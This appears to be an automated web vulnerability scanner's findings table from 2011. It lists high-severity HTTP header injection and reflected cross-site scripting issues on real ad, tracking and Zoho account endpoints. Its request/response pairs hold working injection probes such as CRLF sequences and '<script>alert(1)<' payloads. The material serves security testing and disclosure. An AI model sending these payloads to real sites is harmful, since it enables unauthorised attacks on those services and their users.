| HTTP/1.1 302 Moved Temporarily Date: Sat, 26 Feb 2011 23:29:47 GMT Server: Oracle-Application-Server Content-Length: 4725 Set-Cookie: ORASSO_AUTH_HINT=v1.0 Cache-Control: private Location: https://login.oracle.com dea71b54e71&p_error_code=&p_submit Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerloginadc <HTML><HEAD><TITLE ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tacoda.at.atwola |
| Path: | /rtx/r.js |
| GET /rtx/r.js?cmd=ADN&si Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZs |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:35:33 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:50:33 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZs Set-Cookie: ANRTT=53615^1^1299284361 Set-Cookie: Tsid=0^1298774133 Set-Cookie: TData=99999|^|53575|53656 Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:ca3680f9be00bf67 f7b9b665bf,c638727a4faa7467533 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT ntCoent-Length: 176 Content-Type: application/x-javascript Content-Length: 176 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656 ANRTXR(); |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tacoda.at.atwola |
| Path: | /rtx/r.js |
| GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ATTACID=a3Z0aWQ9MTZs |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:33:28 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:48:28 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZs Set-Cookie: ANRTT=53615^1^1299284361 Set-Cookie: Tsid=0^1298774008 6420ebe94a^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^|53575|53656 Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:ca3680f9be00bf67 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Cteonnt-Length: 176 Content-Type: application/x-javascript Content-Length: 176 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656 ANRTXR(); |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tags.crwdcntrl.net |
| Path: | /5/c=25/b=1225394 |
| GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
| HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6 Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://f335d 6c92f1d82cf=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tags.crwdcntrl.net |
| Path: | /5/c=25/b=1225400 |
| GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
| HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:08 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdza Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://2f2f5 3a2cc9ab32b=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://tags.crwdcntrl.net |
| Path: | /5/c=25/b=1226041 |
| GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: aud=ABR4nGNgYGDwzdxy |
| HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6 Set-Cookie: cc=ACB4nGNQMEuzsLRIs Location: http://2bdae 32111a498f8=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0 |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://accounts.zoho.com |
| Path: | /login |
| GET /login?service_language Host: accounts.zoho.com Connection: keep-alive Referer: http://duck.co/porta Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168905406 |
| HTTP/1.1 200 OK P3P: CP="CAO PSA OUR" Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 01 Mar 2011 02:58:11 GMT Server: ZWS Content-Length: 20982 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Zoho Accounts</title> <style type="text ...[SNIP]... xOf("http://")==0){iurl } var enableReload = true; var serviceurl = 'http://duck.cocbc11';9fabd1aa3a3'; var servicename ='ZohoDiscussions'; var domain_label='null'; var domain_suffix='null'; var partner_domain='null'; var hidesecure = 'null'; ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://accounts.zoho.com |
| Path: | /login |
| GET /login?service_language Host: accounts.zoho.com Connection: keep-alive Referer: http://duck.co/porta Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168905406 |
| HTTP/1.1 200 OK P3P: CP="CAO PSA OUR" Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 01 Mar 2011 02:58:06 GMT Server: ZWS Content-Length: 21044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Zoho Accounts</title> <style type="text ...[SNIP]... <input name="serviceurl" value='http://duck.codec4c'><a b=c>57f8520d9a7' type="hidden"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://accounts.zoho.com |
| Path: | /register |
| GET /register?serviceurl=http Host: accounts.zoho.com Connection: keep-alive Referer: http://www.zoho.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168905406 |
| HTTP/1.1 200 OK Set-Cookie: iamcsr=e664ef78-f1ac-43cb P3P: CP="CAO PSA OUR" Set-Cookie: rtk=1298948242860; Domain=.zoho.com; Path=/ Set-Cookie: JSESSIONID=47F52FEAA Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 01 Mar 2011 02:57:22 GMT Server: ZWS Content-Length: 33949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Create New Account</title> <script type="text ...[SNIP]... A-Za-z0-9]/; var endWithPat = /[A-Za-z0-9]$/; var contDots = /([._][._])+/; var validChars = /^[A-Za-z0-9_\.]+$/; var onlyNumbers = /^[0-9]+$/ var serviceurl = 'http://www.zoho.com/d5eb9';1be191a250d'; var servicename ='AaaServer'; var partner_domain = 'null'; var blockedEmailDomain = '@zoho.com'; var csrfParam = 'iamcsrcoo=e664ef78-f1ac function de(id) { ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://accounts.zoho.com |
| Path: | /register |
| GET /register?serviceurl=http Host: accounts.zoho.com Connection: keep-alive Referer: http://www.zoho.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168905406 |
| HTTP/1.1 200 OK Set-Cookie: iamcsr=6036367f-1895-4835 P3P: CP="CAO PSA OUR" Set-Cookie: rtk=1298948230872; Domain=.zoho.com; Path=/ Set-Cookie: JSESSIONID=E12CEA8FE Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 01 Mar 2011 02:57:10 GMT Server: ZWS Content-Length: 33998 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Create New Account</title> <script type="text ...[SNIP]... <span onclick="window.parent ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://accounts.zoho.com |
| Path: | /register |
| GET /register?serviceurl=http Host: accounts.zoho.com Connection: keep-alive Referer: http://www.zoho.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168905406 |
| HTTP/1.1 200 OK Set-Cookie: iamcsr=65722aa7-5f18-437c P3P: CP="CAO PSA OUR" Set-Cookie: rtk=1298948238307; Domain=.zoho.com; Path=/ Set-Cookie: JSESSIONID=D7A70DBB8 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 01 Mar 2011 02:57:17 GMT Server: ZWS Content-Length: 33998 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Create New Account</title> <script type="text ...[SNIP]... <input name="serviceurl" value='http://www.zoho ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ads.tw.adsonar.com |
| Path: | /adserving/getAds.jsp |
| GET /adserving/getAds.jsp Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:39 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User Content-Length: 2510 <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script> java.lang.NumberForm </head> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ads.tw.adsonar.com |
| Path: | /adserving/getAds.jsp |
| GET /adserving/getAds.jsp Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:16 GMT Vary: Accept-Encoding,User Content-Type: text/plain Content-Length: 3257 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberForm ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ads.tw.adsonar.com |
| Path: | /adserving/getAds.jsp |
| GET /adserving/getAds.jsp Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:02 GMT Vary: Accept-Encoding,User Content-Type: text/plain Content-Length: 3696 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberForm ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://alterianwaserver |
| Path: | /tracking.aspx/gettoken/ |
| GET /tracking.aspx/gettoken/ Host: alterianwaserver Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:10 GMT Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:09 GMT Content-Length: 137 this.altTracker |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://alterianwaserver |
| Path: | /tracking.aspx/submi |
| GET /tracking.aspx/submi Host: alterianwaserver Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:31 GMT Content-Length: 90 this.altTracker |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://alterianwaserver |
| Path: | /tracking.aspx/submi |
| GET /tracking.aspx/submi Host: alterianwaserver Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:30 GMT Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:29 GMT Content-Length: 212 this.altTracker |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://altfarm.mediaplex |
| Path: | /ad/js/3992-121072-16279 |
| GET /ad/js/3992-121072-16279 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=879590159695; mojo3=12309:25586/1551 |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html Content-Length: 527 Date: Sun, 27 Feb 2011 02:31:59 GMT document.write('<a target="_blank" href="http://at.atwola ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://altfarm.mediaplex |
| Path: | /ad/js/3992-121072-16279 |
| GET /ad/js/3992-121072-16279 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=879590159695; mojo3=12309:25586/1551 |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html Content-Length: 527 Date: Sun, 27 Feb 2011 02:32:18 GMT document.write('<a target="_blank" href="http://at.atwola ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://altfarm.mediaplex |
| Path: | /ad/js/3992-121072-16279 |
| GET /ad/js/3992-121072-16279 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=879590159695; mojo3=12309:25586/1551 |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Content-Type: text/html Content-Length: 530 Date: Sun, 27 Feb 2011 02:32:52 GMT document.write('<a target="_blank" href="http://at.atwola ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://api-public.addthis |
| Path: | /url/shares.json |
| GET /url/shares.json?url=http Host: api-public.addthis.com Proxy-Connection: keep-alive Referer: http://www.virtusa.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=300 Content-Type: application/javascript Date: Tue, 01 Mar 2011 13:40:43 GMT Content-Length: 98 Connection: close _ate.cbs.sc_httpwwwv |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://api.postup.com |
| Path: | /TCTUL001/twidget/1.jsonp |
| GET /TCTUL001/twidget/1.jsonp Host: api.postup.com Proxy-Connection: keep-alive Referer: http://www.tweetup.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Sun, 27 Feb 2011 02:32:03 GMT Content-Type: text/javascript; charset=UTF-8 Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: bc=9CE434E0-6353-4F68 Set-Cookie: sc=6148C463-8CE9-4536 Set-Cookie: bp=NR6mPz0SXEsXB CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT Content-Length: 19542 jsonp1298773825717a5385<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://apps.conduit |
| Path: | /TechCrunchApp-Techcrunch |
| GET /TechCrunchApp-Techcrunch Host: apps.conduit-banners.com Proxy-Connection: keep-alive Referer: http://techcrunch.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: private Date: Sun, 27 Feb 2011 03:31:08 GMT Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Content-Length: 4674 function imgToGoOnLoad__806157278 SharedItems.Togo.Manager ...[SNIP]... <img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=876688<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:51 GMT Date: Sun, 27 Feb 2011 16:44:51 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... MSCORE.purge=function(a) COMSCORE.beacon({c1:"876688<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955a70f0<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... 1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"4dfb7<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:52 GMT Date: Sun, 27 Feb 2011 16:44:52 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... e=function(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113bc9c3<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
